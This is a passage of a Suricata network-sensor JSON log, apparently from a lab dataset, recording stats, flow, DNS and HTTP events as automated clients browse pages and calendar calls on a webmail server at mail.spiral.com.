{"timestamp":"2020-02-29T00:15:12.000160+0000","event_type":"stats","stats":{"uptime":14564,"capture":{"kernel_packets":135848,"kernel_drops":0},"decoder":{"pkts":135873,"bytes":93512839,"invalid":188,"ipv4":134366,"ipv6":8,"ethernet":135873,"raw":0,"null":0,"sll":0,"tcp":129013,"udp":5150,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":688,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7099072},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2786,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2802,"synack":2793,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":143,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1825,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2354,"failed_udp":112},"tx":{"http":4685,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2434}},"flow_mgr":{"closed_pruned":2766,"new_pruned":15,"est_pruned":2394,"bypassed_pruned":0,"flows_checked":4,"flows_notimeout":4,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65532,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":24132,"memcap_state":0,"memcap_global":0},"http":{"memuse":139580,"memcap":0}}} {"timestamp":"2020-02-29T00:15:12.002010+0000","flow_id":756720302109332,"event_type":"flow","src_ip":"192.168.10.130","src_port":34826,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":10,"pkts_toclient":10,"bytes_toserver":1153,"bytes_toclient":7795,"start":"2020-02-29T00:14:05.864916+0000","end":"2020-02-29T00:14:11.316494+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:15:12.596564+0000","flow_id":2078036930179823,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34840,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6990},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":37033,"tx_id":0}} {"timestamp":"2020-02-29T00:15:12.611502+0000","flow_id":148136325567662,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":45317,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":54842,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:15:12.719590+0000","flow_id":148136325567662,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45317,"proto":"UDP","dns":{"type":"answer","id":54842,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:15:12.719590+0000","flow_id":148136325567662,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45317,"proto":"UDP","dns":{"type":"answer","id":54842,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:15:13.267260+0000","flow_id":2078036930179823,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34840,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24340}} {"timestamp":"2020-02-29T00:15:13.410859+0000","flow_id":2078036930179823,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34840,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24340},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/","state":"TRUNCATED","stored":false,"size":106496,"tx_id":1}} {"timestamp":"2020-02-29T00:15:13.425463+0000","flow_id":1624213506063863,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":43745,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":56364,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:15:13.533751+0000","flow_id":1624213506063863,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":43745,"proto":"UDP","dns":{"type":"answer","id":56364,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:15:13.533751+0000","flow_id":1624213506063863,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":43745,"proto":"UDP","dns":{"type":"answer","id":56364,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:15:13.589999+0000","flow_id":2078036930179823,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34840,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":639}} {"timestamp":"2020-02-29T00:15:13.589999+0000","flow_id":2078036930179823,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34840,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":639},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listCalendars","state":"CLOSED","stored":false,"size":29,"tx_id":2}} {"timestamp":"2020-02-29T00:15:13.612765+0000","flow_id":2078036930179823,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34840,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":639},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listCalendars","state":"CLOSED","stored":false,"size":1656,"tx_id":2}} {"timestamp":"2020-02-29T00:15:13.624275+0000","flow_id":104855940204179,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":50670,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":51156,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:15:13.729610+0000","flow_id":104855940204179,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":50670,"proto":"UDP","dns":{"type":"answer","id":51156,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:15:13.729610+0000","flow_id":104855940204179,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":50670,"proto":"UDP","dns":{"type":"answer","id":51156,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:15:13.763662+0000","flow_id":978800180569870,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":50520,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":17701,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:15:13.872716+0000","flow_id":978800180569870,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":50520,"proto":"UDP","dns":{"type":"answer","id":17701,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:15:13.872716+0000","flow_id":978800180569870,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":50520,"proto":"UDP","dns":{"type":"answer","id":17701,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:15:13.900021+0000","flow_id":862814588722720,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34842,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126}} {"timestamp":"2020-02-29T00:15:13.900021+0000","flow_id":862814588722720,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34842,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":137,"tx_id":0}} {"timestamp":"2020-02-29T00:15:13.939863+0000","flow_id":2078036930179823,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34840,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":592}} {"timestamp":"2020-02-29T00:15:13.939863+0000","flow_id":2078036930179823,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34840,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":592},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":128,"tx_id":3}} {"timestamp":"2020-02-29T00:15:14.111009+0000","flow_id":422730764433898,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34838,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/turba\/search.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/contact.php?source=P7pxaJ1DBxG_43W0bvFVAZB&key=5vmPLSQuRAd-p6FI4ND2V1R","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4067},"app_proto":"http","fileinfo":{"filename":"\/turba\/search.php","state":"CLOSED","stored":false,"size":19292,"tx_id":1}} {"timestamp":"2020-02-29T00:15:17.000641+0000","flow_id":1917516803235951,"event_type":"flow","src_ip":"192.168.10.122","src_port":34781,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:10:16.614511+0000","end":"2020-02-29T00:10:16.722829+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:15:18.901872+0000","flow_id":2078036930179823,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34840,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":592},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":1378,"tx_id":3}} {"timestamp":"2020-02-29T00:15:18.902890+0000","flow_id":862814588722720,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34842,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":115,"tx_id":0}} {"timestamp":"2020-02-29T00:15:19.000178+0000","event_type":"stats","stats":{"uptime":14571,"capture":{"kernel_packets":135935,"kernel_drops":0},"decoder":{"pkts":135937,"bytes":93547486,"invalid":188,"ipv4":134426,"ipv6":8,"ethernet":135937,"raw":0,"null":0,"sll":0,"tcp":129065,"udp":5158,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":688,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7099936},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2787,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2803,"synack":2794,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":143,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1826,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2358,"failed_udp":112},"tx":{"http":4689,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2438}},"flow_mgr":{"closed_pruned":2767,"new_pruned":15,"est_pruned":2395,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":0,"flows_timeout":1,"flows_timeout_inuse":0,"flows_removed":1,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":25125,"memcap_state":0,"memcap_global":0},"http":{"memuse":46654,"memcap":0}}} {"timestamp":"2020-02-29T00:15:22.000308+0000","flow_id":854757210952885,"event_type":"flow","src_ip":"192.168.10.122","src_port":41533,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:10:21.758965+0000","end":"2020-02-29T00:10:21.866749+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:15:23.000280+0000","flow_id":1577625976740859,"event_type":"flow","src_ip":"192.168.10.122","src_port":44212,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:10:22.629755+0000","end":"2020-02-29T00:10:22.738168+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:15:23.000607+0000","flow_id":1445628746846607,"event_type":"flow","src_ip":"192.168.10.122","src_port":42445,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:10:22.840079+0000","end":"2020-02-29T00:10:22.948426+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:15:24.000695+0000","flow_id":1378485523115176,"event_type":"flow","src_ip":"192.168.10.122","src_port":53812,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:10:22.978088+0000","end":"2020-02-29T00:10:23.086656+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:15:24.919104+0000","flow_id":500671536956992,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":34200,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":10440,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:15:25.027922+0000","flow_id":500671536956992,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34200,"proto":"UDP","dns":{"type":"answer","id":10440,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:15:25.027922+0000","flow_id":500671536956992,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34200,"proto":"UDP","dns":{"type":"answer","id":10440,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:15:25.153993+0000","flow_id":1221616157382490,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52760,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7994}} {"timestamp":"2020-02-29T00:15:26.000239+0000","event_type":"stats","stats":{"uptime":14578,"capture":{"kernel_packets":135939,"kernel_drops":0},"decoder":{"pkts":135941,"bytes":93547750,"invalid":188,"ipv4":134430,"ipv6":8,"ethernet":135941,"raw":0,"null":0,"sll":0,"tcp":129069,"udp":5158,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":688,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10002,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7099360},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2787,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2803,"synack":2794,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":143,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1826,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2358,"failed_udp":112},"tx":{"http":4689,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2438}},"flow_mgr":{"closed_pruned":2767,"new_pruned":15,"est_pruned":2398,"bypassed_pruned":0,"flows_checked":3,"flows_notimeout":1,"flows_timeout":2,"flows_timeout_inuse":0,"flows_removed":2,"rows_checked":65536,"rows_skipped":65532,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":24131,"memcap_state":0,"memcap_global":0},"http":{"memuse":132277,"memcap":0}}} {"timestamp":"2020-02-29T00:15:27.000847+0000","flow_id":106655512661597,"event_type":"flow","src_ip":"192.168.10.122","src_port":52175,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:10:26.069213+0000","end":"2020-02-29T00:10:26.177585+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:15:27.481543+0000","flow_id":1221616157382490,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52760,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7994},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":45876,"tx_id":0}} {"timestamp":"2020-02-29T00:15:27.489535+0000","flow_id":816909979187263,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":58159,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":39614,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:15:27.598059+0000","flow_id":816909979187263,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":58159,"proto":"UDP","dns":{"type":"answer","id":39614,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:15:27.598059+0000","flow_id":816909979187263,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":58159,"proto":"UDP","dns":{"type":"answer","id":39614,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:15:27.654066+0000","flow_id":1221616157382490,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52760,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/nag\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8273}} {"timestamp":"2020-02-29T00:15:29.000300+0000","flow_id":1297456683777400,"event_type":"flow","src_ip":"192.168.10.130","src_port":34824,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":11,"bytes_toserver":1153,"bytes_toclient":9222,"start":"2020-02-29T00:13:51.621944+0000","end":"2020-02-29T00:14:28.518250+0000","age":37,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:15:32.654078+0000","flow_id":1221616157382490,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52760,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8273},"app_proto":"http","fileinfo":{"filename":"\/nag\/","state":"CLOSED","stored":false,"size":35273,"tx_id":1}} {"timestamp":"2020-02-29T00:15:33.000226+0000","event_type":"stats","stats":{"uptime":14585,"capture":{"kernel_packets":135960,"kernel_drops":0},"decoder":{"pkts":135974,"bytes":93568102,"invalid":188,"ipv4":134463,"ipv6":8,"ethernet":135974,"raw":0,"null":0,"sll":0,"tcp":129098,"udp":5162,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":688,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7099072},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2788,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2804,"synack":2795,"rst":1207,"